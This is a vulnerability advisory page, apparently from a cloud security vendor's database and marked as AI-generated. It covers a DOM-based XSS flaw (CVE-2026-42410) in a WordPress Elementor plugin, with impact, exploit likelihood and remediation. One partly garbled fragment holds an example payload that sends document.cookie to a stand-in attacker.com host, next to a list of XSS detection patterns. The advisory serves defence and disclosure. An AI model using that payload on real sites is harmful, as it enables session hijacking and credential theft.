
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-42410 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in CodexThemes TheGem Theme Elements plugin for Elementor (WordPress). It stems from improper neutralization of input during web page generation (CWE-79), allowing low-privileged attackers to inject malicious scripts that execute in victims' browsers. All versions of the plugin prior to 5.12.1.1 are affected. The vulnerability was reported on January 23, 2026, and publicly disclosed on April 27, 2026, by Patchstack (credited to researcher João Pedro S Alcântara / Kinorth). It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and specifically manifests as DOM-Based XSS, meaning malicious payloads are processed and executed entirely within the browser's DOM without necessarily being reflected in the server's HTTP response. An attacker with at least Contributor-level privileges on a WordPress site can craft input that is written to the DOM without proper sanitization or output encoding, enabling script injection. Exploitation requires user interaction — a privileged user must visit or interact with a page containing the malicious content. No public proof-of-concept code has been identified at this time (Patchstack, GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim user's browser session, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, and defacement of web page content. Because the scope is marked as "Changed," the injected script can affect resources beyond the vulnerable component itself. The confidentiality, integrity, and availability impacts are each rated Low, reflecting limited but real risk to site visitors and administrators (Patchstack, GitHub Advisory).
There is no known public proof-of-concept exploit and no evidence of active in-the-wild exploitation at this time. The EPSS score is approximately 0.033–0.039%, placing it in the 12th percentile for exploitation likelihood within the next 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum Contributor-level WordPress privileges and user interaction, which limits opportunistic mass exploitation, though Patchstack notes that XSS vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites (Patchstack, GitHub Advisory).
<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>) into an input field that is rendered without proper sanitization./wp-admin/admin-ajax.php) from low-privileged user accounts; unexpected content edits by Contributor-level users in WordPress audit logs.<script>, onerror=, eval(, atob().The primary remediation is to update the TheGem Theme Elements (for Elementor) plugin to version 5.12.1.1 or later, which contains the fix for this vulnerability (Patchstack). For sites where immediate patching is not feasible, deploy Web Application Firewall (WAF) rules to detect and block DOM-based XSS attempts, and enforce Content Security Policy (CSP) headers to restrict inline script execution. Patchstack users can enable auto-update for vulnerable plugins to receive protection automatically. Additionally, restrict Contributor-level user permissions where possible to reduce the attack surface.
Wordfence included CVE-2026-42410 in its weekly WordPress vulnerability report covering April 27 – May 3, 2026, highlighting it among other plugin vulnerabilities disclosed that week (Wordfence Blog). Patchstack, which coordinated the disclosure, rated the vulnerability as low priority and noted it is unlikely to be exploited in isolation, though XSS vulnerabilities in WordPress plugins are frequently targeted in mass-exploit campaigns (Patchstack). No significant broader media coverage or notable researcher commentary beyond standard vulnerability tracking has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."